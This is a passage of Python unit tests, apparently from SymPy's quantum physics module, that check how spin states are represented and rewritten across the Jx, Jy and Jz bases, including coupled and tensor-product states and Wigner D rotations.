assert represent(JzKet(S.Half, S.Half), basis=Jz) == Matrix([1, 0])
assert represent(JzKet(S.Half, Rational(-1, 2)), basis=Jz) == Matrix([0, 1])
assert represent(JzKet(1, 1), basis=Jz) == Matrix([1, 0, 0])
assert represent(JzKet(1, 0), basis=Jz) == Matrix([0, 1, 0])
assert represent(JzKet(1, -1), basis=Jz) == Matrix([0, 0, 1])
def test_represent_uncoupled_states():
# Jx basis
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, S.Half)), basis=Jx
) == Matrix([1, 0, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, Rational(-1, 2))), basis=Jx
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, S.Half)), basis=Jx
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, Rational(-1, 2))),
basis=Jx,
) == Matrix([0, 0, 0, 1])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, S.Half)), basis=Jx
) == Matrix([-I, 0, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, Rational(-1, 2))), basis=Jx
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, S.Half)), basis=Jx
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, Rational(-1, 2))),
basis=Jx,
) == Matrix([0, 0, 0, I])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)), basis=Jx
) == Matrix([S.Half, Rational(-1, 2), Rational(-1, 2), S.Half])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))), basis=Jx
) == Matrix([S.Half, S.Half, Rational(-1, 2), Rational(-1, 2)])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)), basis=Jx
) == Matrix([S.Half, Rational(-1, 2), S.Half, Rational(-1, 2)])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))),
basis=Jx,
) == Matrix([S.Half, S.Half, S.Half, S.Half])
# Jy basis
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, S.Half)), basis=Jy
) == Matrix([I, 0, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, Rational(-1, 2))), basis=Jy
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, S.Half)), basis=Jy
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, Rational(-1, 2))),
basis=Jy,
) == Matrix([0, 0, 0, -I])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, S.Half)), basis=Jy
) == Matrix([1, 0, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, Rational(-1, 2))), basis=Jy
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, S.Half)), basis=Jy
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, Rational(-1, 2))),
basis=Jy,
) == Matrix([0, 0, 0, 1])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)), basis=Jy
) == Matrix([S.Half, -I / 2, -I / 2, Rational(-1, 2)])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))), basis=Jy
) == Matrix([-I / 2, S.Half, Rational(-1, 2), -I / 2])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)), basis=Jy
) == Matrix([-I / 2, Rational(-1, 2), S.Half, -I / 2])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))),
basis=Jy,
) == Matrix([Rational(-1, 2), -I / 2, -I / 2, S.Half])
# Jz basis
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, S.Half)), basis=Jz
) == Matrix([S.Half, S.Half, S.Half, S.Half])
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, Rational(-1, 2))), basis=Jz
) == Matrix([Rational(-1, 2), S.Half, Rational(-1, 2), S.Half])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, S.Half)), basis=Jz
) == Matrix([Rational(-1, 2), Rational(-1, 2), S.Half, S.Half])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, Rational(-1, 2))),
basis=Jz,
) == Matrix([S.Half, Rational(-1, 2), Rational(-1, 2), S.Half])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, S.Half)), basis=Jz
) == Matrix([S.Half, I / 2, I / 2, Rational(-1, 2)])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, Rational(-1, 2))), basis=Jz
) == Matrix([I / 2, S.Half, Rational(-1, 2), I / 2])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, S.Half)), basis=Jz
) == Matrix([I / 2, Rational(-1, 2), S.Half, I / 2])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, Rational(-1, 2))),
basis=Jz,
) == Matrix([Rational(-1, 2), I / 2, I / 2, S.Half])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)), basis=Jz
) == Matrix([1, 0, 0, 0])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))), basis=Jz
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)), basis=Jz
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))),
basis=Jz,
) == Matrix([0, 0, 0, 1])
def test_represent_coupled_states():
# Jx basis
assert represent(JxKetCoupled(0, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[1, 0, 0, 0]
)
assert represent(JxKetCoupled(1, 1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 1, 0, 0]
)
assert represent(JxKetCoupled(1, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 1, 0]
)
assert represent(JxKetCoupled(1, -1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 0, 1]
)
assert represent(JyKetCoupled(0, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[1, 0, 0, 0]
)
assert represent(JyKetCoupled(1, 1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, -I, 0, 0]
)
assert represent(JyKetCoupled(1, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 1, 0]
)
assert represent(JyKetCoupled(1, -1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 0, I]
)
assert represent(JzKetCoupled(0, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[1, 0, 0, 0]
)
assert represent(JzKetCoupled(1, 1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, S.Half, -sqrt(2) / 2, S.Half]
)
assert represent(JzKetCoupled(1, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, sqrt(2) / 2, 0, -sqrt(2) / 2]
)
assert represent(JzKetCoupled(1, -1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, S.Half, sqrt(2) / 2, S.Half]
)
# Jy basis
assert represent(JxKetCoupled(0, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[1, 0, 0, 0]
)
assert represent(JxKetCoupled(1, 1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, I, 0, 0]
)
assert represent(JxKetCoupled(1, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 1, 0]
)
assert represent(JxKetCoupled(1, -1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 0, -I]
)
assert represent(JyKetCoupled(0, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[1, 0, 0, 0]
)
assert represent(JyKetCoupled(1, 1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 1, 0, 0]
)
assert represent(JyKetCoupled(1, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 1, 0]
)
assert represent(JyKetCoupled(1, -1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 0, 1]
)
assert represent(JzKetCoupled(0, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[1, 0, 0, 0]
)
assert represent(JzKetCoupled(1, 1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, S.Half, -I * sqrt(2) / 2, Rational(-1, 2)]
)
assert represent(JzKetCoupled(1, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, -I * sqrt(2) / 2, 0, -I * sqrt(2) / 2]
)
assert represent(JzKetCoupled(1, -1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, Rational(-1, 2), -I * sqrt(2) / 2, S.Half]
)
# Jz basis
assert represent(JxKetCoupled(0, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[1, 0, 0, 0]
)
assert represent(JxKetCoupled(1, 1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, S.Half, sqrt(2) / 2, S.Half]
)
assert represent(JxKetCoupled(1, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, -sqrt(2) / 2, 0, sqrt(2) / 2]
)
assert represent(JxKetCoupled(1, -1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, S.Half, -sqrt(2) / 2, S.Half]
)
assert represent(JyKetCoupled(0, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[1, 0, 0, 0]
)
assert represent(JyKetCoupled(1, 1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, S.Half, I * sqrt(2) / 2, Rational(-1, 2)]
)
assert represent(JyKetCoupled(1, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, I * sqrt(2) / 2, 0, I * sqrt(2) / 2]
)
assert represent(JyKetCoupled(1, -1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, Rational(-1, 2), I * sqrt(2) / 2, S.Half]
)
assert represent(JzKetCoupled(0, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[1, 0, 0, 0]
)
assert represent(JzKetCoupled(1, 1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, 1, 0, 0]
)
assert represent(JzKetCoupled(1, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, 0, 1, 0]
)
assert represent(JzKetCoupled(1, -1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, 0, 0, 1]
)
def test_represent_rotation():
assert represent(Rotation(0, pi / 2, 0)) == Matrix(
[
[
WignerD(S(1) / 2, S(1) / 2, S(1) / 2, 0, pi / 2, 0),
WignerD(S.Half, S.Half, Rational(-1, 2), 0, pi / 2, 0),
],
[
WignerD(S.Half, Rational(-1, 2), S.Half, 0, pi / 2, 0),
WignerD(S.Half, Rational(-1, 2), Rational(-1, 2), 0, pi / 2, 0),
],
]
)
assert represent(Rotation(0, pi / 2, 0), doit=True) == Matrix(
[[sqrt(2) / 2, -sqrt(2) / 2], [sqrt(2) / 2, sqrt(2) / 2]]
)
def test_rewrite_same():
# Rewrite to same basis
assert JxBra(1, 1).rewrite("Jx") == JxBra(1, 1)
assert JxBra(j, m).rewrite("Jx") == JxBra(j, m)
assert JxKet(1, 1).rewrite("Jx") == JxKet(1, 1)
assert JxKet(j, m).rewrite("Jx") == JxKet(j, m)
def test_rewrite_Bra():
# Numerical
assert JxBra(1, 1).rewrite("Jy") == -I * JyBra(1, 1)
assert JxBra(1, 0).rewrite("Jy") == JyBra(1, 0)
assert JxBra(1, -1).rewrite("Jy") == I * JyBra(1, -1)
assert (
JxBra(1, 1).rewrite("Jz")
== JzBra(1, 1) / 2 + JzBra(1, 0) / sqrt(2) + JzBra(1, -1) / 2
)
assert (
JxBra(1, 0).rewrite("Jz")
== -sqrt(2) * JzBra(1, 1) / 2 + sqrt(2) * JzBra(1, -1) / 2
)
assert (
JxBra(1, -1).rewrite("Jz")
== JzBra(1, 1) / 2 - JzBra(1, 0) / sqrt(2) + JzBra(1, -1) / 2
)
assert JyBra(1, 1).rewrite("Jx") == I * JxBra(1, 1)
assert JyBra(1, 0).rewrite("Jx") == JxBra(1, 0)
assert JyBra(1, -1).rewrite("Jx") == -I * JxBra(1, -1)
assert (
JyBra(1, 1).rewrite("Jz")
== JzBra(1, 1) / 2 - sqrt(2) * I * JzBra(1, 0) / 2 - JzBra(1, -1) / 2
)
assert (
JyBra(1, 0).rewrite("Jz")
== -sqrt(2) * I * JzBra(1, 1) / 2 - sqrt(2) * I * JzBra(1, -1) / 2
)
assert (
JyBra(1, -1).rewrite("Jz")
== -JzBra(1, 1) / 2 - sqrt(2) * I * JzBra(1, 0) / 2 + JzBra(1, -1) / 2
)
assert (
JzBra(1, 1).rewrite("Jx")
== JxBra(1, 1) / 2 - sqrt(2) * JxBra(1, 0) / 2 + JxBra(1, -1) / 2
)
assert (
JzBra(1, 0).rewrite("Jx")
== sqrt(2) * JxBra(1, 1) / 2 - sqrt(2) * JxBra(1, -1) / 2
)
assert (
JzBra(1, -1).rewrite("Jx")
== JxBra(1, 1) / 2 + sqrt(2) * JxBra(1, 0) / 2 + JxBra(1, -1) / 2
)
assert (
JzBra(1, 1).rewrite("Jy")
== JyBra(1, 1) / 2 + sqrt(2) * I * JyBra(1, 0) / 2 - JyBra(1, -1) / 2
)
assert (
JzBra(1, 0).rewrite("Jy")
== sqrt(2) * I * JyBra(1, 1) / 2 + sqrt(2) * I * JyBra(1, -1) / 2
)
assert (
JzBra(1, -1).rewrite("Jy")
== -JyBra(1, 1) / 2 + sqrt(2) * I * JyBra(1, 0) / 2 + JyBra(1, -1) / 2
)
# Symbolic
assert JxBra(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), 0, 0) * JyBra(j, mi), (mi, -j, j)
)
assert JxBra(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, 0, pi / 2, 0) * JzBra(j, mi), (mi, -j, j)
)
assert JyBra(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, 0, pi / 2) * JxBra(j, mi), (mi, -j, j)
)
assert JyBra(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2) * JzBra(j, mi),
(mi, -j, j),
)
assert JzBra(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, pi * Rational(3, 2), 0) * JxBra(j, mi), (mi, -j, j)
)
assert JzBra(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), pi / 2, pi / 2) * JyBra(j, mi),
(mi, -j, j),
)
def test_rewrite_Ket():
# Numerical
assert JxKet(1, 1).rewrite("Jy") == I * JyKet(1, 1)
assert JxKet(1, 0).rewrite("Jy") == JyKet(1, 0)
assert JxKet(1, -1).rewrite("Jy") == -I * JyKet(1, -1)
assert (
JxKet(1, 1).rewrite("Jz")
== JzKet(1, 1) / 2 + JzKet(1, 0) / sqrt(2) + JzKet(1, -1) / 2
)
assert (
JxKet(1, 0).rewrite("Jz")
== -sqrt(2) * JzKet(1, 1) / 2 + sqrt(2) * JzKet(1, -1) / 2
)
assert (
JxKet(1, -1).rewrite("Jz")
== JzKet(1, 1) / 2 - JzKet(1, 0) / sqrt(2) + JzKet(1, -1) / 2
)
assert JyKet(1, 1).rewrite("Jx") == -I * JxKet(1, 1)
assert JyKet(1, 0).rewrite("Jx") == JxKet(1, 0)
assert JyKet(1, -1).rewrite("Jx") == I * JxKet(1, -1)
assert (
JyKet(1, 1).rewrite("Jz")
== JzKet(1, 1) / 2 + sqrt(2) * I * JzKet(1, 0) / 2 - JzKet(1, -1) / 2
)
assert (
JyKet(1, 0).rewrite("Jz")
== sqrt(2) * I * JzKet(1, 1) / 2 + sqrt(2) * I * JzKet(1, -1) / 2
)
assert (
JyKet(1, -1).rewrite("Jz")
== -JzKet(1, 1) / 2 + sqrt(2) * I * JzKet(1, 0) / 2 + JzKet(1, -1) / 2
)
assert (
JzKet(1, 1).rewrite("Jx")
== JxKet(1, 1) / 2 - sqrt(2) * JxKet(1, 0) / 2 + JxKet(1, -1) / 2
)
assert (
JzKet(1, 0).rewrite("Jx")
== sqrt(2) * JxKet(1, 1) / 2 - sqrt(2) * JxKet(1, -1) / 2
)
assert (
JzKet(1, -1).rewrite("Jx")
== JxKet(1, 1) / 2 + sqrt(2) * JxKet(1, 0) / 2 + JxKet(1, -1) / 2
)
assert (
JzKet(1, 1).rewrite("Jy")
== JyKet(1, 1) / 2 - sqrt(2) * I * JyKet(1, 0) / 2 - JyKet(1, -1) / 2
)
assert (
JzKet(1, 0).rewrite("Jy")
== -sqrt(2) * I * JyKet(1, 1) / 2 - sqrt(2) * I * JyKet(1, -1) / 2
)
assert (
JzKet(1, -1).rewrite("Jy")
== -JyKet(1, 1) / 2 - sqrt(2) * I * JyKet(1, 0) / 2 + JyKet(1, -1) / 2
)
# Symbolic
assert JxKet(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), 0, 0) * JyKet(j, mi), (mi, -j, j)
)
assert JxKet(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, 0, pi / 2, 0) * JzKet(j, mi), (mi, -j, j)
)
assert JyKet(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, 0, pi / 2) * JxKet(j, mi), (mi, -j, j)
)
assert JyKet(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2) * JzKet(j, mi),
(mi, -j, j),
)
assert JzKet(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, pi * Rational(3, 2), 0) * JxKet(j, mi), (mi, -j, j)
)
assert JzKet(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), pi / 2, pi / 2) * JyKet(j, mi),
(mi, -j, j),
)
def test_rewrite_uncoupled_state():
# Numerical
assert TensorProduct(JyKet(1, 1), JxKet(1, 1)).rewrite("Jx") == -I * TensorProduct(
JxKet(1, 1), JxKet(1, 1)
)
assert TensorProduct(JyKet(1, 0), JxKet(1, 1)).rewrite("Jx") == TensorProduct(
JxKet(1, 0), JxKet(1, 1)
)
assert TensorProduct(JyKet(1, -1), JxKet(1, 1)).rewrite("Jx") == I * TensorProduct(
JxKet(1, -1), JxKet(1, 1)
)
assert (
TensorProduct(JzKet(1, 1), JxKet(1, 1)).rewrite("Jx")
== TensorProduct(JxKet(1, -1), JxKet(1, 1)) / 2
- sqrt(2) * TensorProduct(JxKet(1, 0), JxKet(1, 1)) / 2
+ TensorProduct(JxKet(1, 1), JxKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, 0), JxKet(1, 1)).rewrite("Jx")
== -sqrt(2) * TensorProduct(JxKet(1, -1), JxKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JxKet(1, 1), JxKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, -1), JxKet(1, 1)).rewrite("Jx")
== TensorProduct(JxKet(1, -1), JxKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JxKet(1, 0), JxKet(1, 1)) / 2
+ TensorProduct(JxKet(1, 1), JxKet(1, 1)) / 2
)
assert TensorProduct(JxKet(1, 1), JyKet(1, 1)).rewrite("Jy") == I * TensorProduct(
JyKet(1, 1), JyKet(1, 1)
)
assert TensorProduct(JxKet(1, 0), JyKet(1, 1)).rewrite("Jy") == TensorProduct(
JyKet(1, 0), JyKet(1, 1)
)
assert TensorProduct(JxKet(1, -1), JyKet(1, 1)).rewrite("Jy") == -I * TensorProduct(
JyKet(1, -1), JyKet(1, 1)
)
assert (
TensorProduct(JzKet(1, 1), JyKet(1, 1)).rewrite("Jy")
== -TensorProduct(JyKet(1, -1), JyKet(1, 1)) / 2
- sqrt(2) * I * TensorProduct(JyKet(1, 0), JyKet(1, 1)) / 2
+ TensorProduct(JyKet(1, 1), JyKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, 0), JyKet(1, 1)).rewrite("Jy")
== -sqrt(2) * I * TensorProduct(JyKet(1, -1), JyKet(1, 1)) / 2
- sqrt(2) * I * TensorProduct(JyKet(1, 1), JyKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, -1), JyKet(1, 1)).rewrite("Jy")
== TensorProduct(JyKet(1, -1), JyKet(1, 1)) / 2
- sqrt(2) * I * TensorProduct(JyKet(1, 0), JyKet(1, 1)) / 2
- TensorProduct(JyKet(1, 1), JyKet(1, 1)) / 2
)
assert (
TensorProduct(JxKet(1, 1), JzKet(1, 1)).rewrite("Jz")
== TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JxKet(1, 0), JzKet(1, 1)).rewrite("Jz")
== sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JxKet(1, -1), JzKet(1, 1)).rewrite("Jz")
== TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JyKet(1, 1), JzKet(1, 1)).rewrite("Jz")
== -TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * I * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JyKet(1, 0), JzKet(1, 1)).rewrite("Jz")
== sqrt(2) * I * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * I * TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
assert (
TensorProduct(JyKet(1, -1), JzKet(1, 1)).rewrite("Jz")
== TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
+ sqrt(2) * I * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 1), JzKet(1, 1)) / 2
)
# Symbolic
assert TensorProduct(JyKet(j1, m1), JxKet(j2, m2)).rewrite("Jy") == TensorProduct(
JyKet(j1, m1),
Sum(
WignerD(j2, mi, m2, pi * Rational(3, 2), 0, 0) * JyKet(j2, mi),
(mi, -j2, j2),
),
)
assert TensorProduct(JzKet(j1, m1), JxKet(j2, m2)).rewrite("Jz") == TensorProduct(
JzKet(j1, m1),
Sum(WignerD(j2, mi, m2, 0, pi / 2, 0) * JzKet(j2, mi), (mi, -j2, j2)),
)
assert TensorProduct(JxKet(j1, m1), JyKet(j2, m2)).rewrite("Jx") == TensorProduct(
JxKet(j1, m1),
Sum(WignerD(j2, mi, m2, 0, 0, pi / 2) * JxKet(j2, mi), (mi, -j2, j2)),
)
assert TensorProduct(JzKet(j1, m1), JyKet(j2, m2)).rewrite("Jz") == TensorProduct(
JzKet(j1, m1),
Sum(
WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2) * JzKet(j2, mi),
(mi, -j2, j2),
),
)
assert TensorProduct(JxKet(j1, m1), JzKet(j2, m2)).rewrite("Jx") == TensorProduct(
JxKet(j1, m1),
Sum(
WignerD(j2, mi, m2, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi),
(mi, -j2, j2),
),
)
assert TensorProduct(JyKet(j1, m1), JzKet(j2, m2)).rewrite("Jy") == TensorProduct(
JyKet(j1, m1),
Sum(
WignerD(j2, mi, m2, pi * Rational(3, 2), pi / 2, pi / 2) * JyKet(j2, mi),
(mi, -j2, j2),
),
)
def test_rewrite_coupled_state():
# Numerical
assert JyKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jx") == JxKetCoupled(
0, 0, (S.Half, S.Half)
)
assert JyKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jx") == -I * JxKetCoupled(
1, 1, (S.Half, S.Half)
)
assert JyKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jx") == JxKetCoupled(
1, 0, (S.Half, S.Half)
)
assert JyKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jx") == I * JxKetCoupled(
1, -1, (S.Half, S.Half)
)
assert JzKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jx") == JxKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JzKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jx")
== JxKetCoupled(1, 1, (S.Half, S.Half)) / 2
- sqrt(2) * JxKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JxKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jx")
== sqrt(2) * JxKetCoupled(1, 1, (S(1) / 2, S.Half)) / 2
- sqrt(2) * JxKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jx")
== JxKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ sqrt(2) * JxKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JxKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert JxKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jy") == JyKetCoupled(
0, 0, (S.Half, S.Half)
)
assert JxKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jy") == I * JyKetCoupled(
1, 1, (S.Half, S.Half)
)
assert JxKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jy") == JyKetCoupled(
1, 0, (S.Half, S.Half)
)
assert JxKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jy") == -I * JyKetCoupled(
1, -1, (S.Half, S.Half)
)
assert JzKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jy") == JyKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JzKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jy")
== JyKetCoupled(1, 1, (S.Half, S.Half)) / 2
- I * sqrt(2) * JyKetCoupled(1, 0, (S.Half, S.Half)) / 2
- JyKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jy")
== -I * sqrt(2) * JyKetCoupled(1, 1, (S.Half, S.Half)) / 2
- I * sqrt(2) * JyKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JzKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jy")
== -JyKetCoupled(1, 1, (S.Half, S.Half)) / 2
- I * sqrt(2) * JyKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JyKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert JxKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jz") == JzKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JxKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jz")
== JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JxKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jz")
== -sqrt(2) * JzKetCoupled(1, 1, (S(1) / 2, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JxKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jz")
== JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
- sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert JyKetCoupled(0, 0, (S.Half, S.Half)).rewrite("Jz") == JzKetCoupled(
0, 0, (S.Half, S.Half)
)
assert (
JyKetCoupled(1, 1, (S.Half, S.Half)).rewrite("Jz")
== JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ I * sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
- JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JyKetCoupled(1, 0, (S.Half, S.Half)).rewrite("Jz")
== I * sqrt(2) * JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ I * sqrt(2) * JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
assert (
JyKetCoupled(1, -1, (S.Half, S.Half)).rewrite("Jz")
== -JzKetCoupled(1, 1, (S.Half, S.Half)) / 2
+ I * sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
+ JzKetCoupled(1, -1, (S.Half, S.Half)) / 2
)
# Symbolic
assert JyKetCoupled(j, m, (j1, j2)).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, 0, pi / 2) * JxKetCoupled(j, mi, (j1, j2)), (mi, -j, j)
)
assert JzKetCoupled(j, m, (j1, j2)).rewrite("Jx") == Sum(
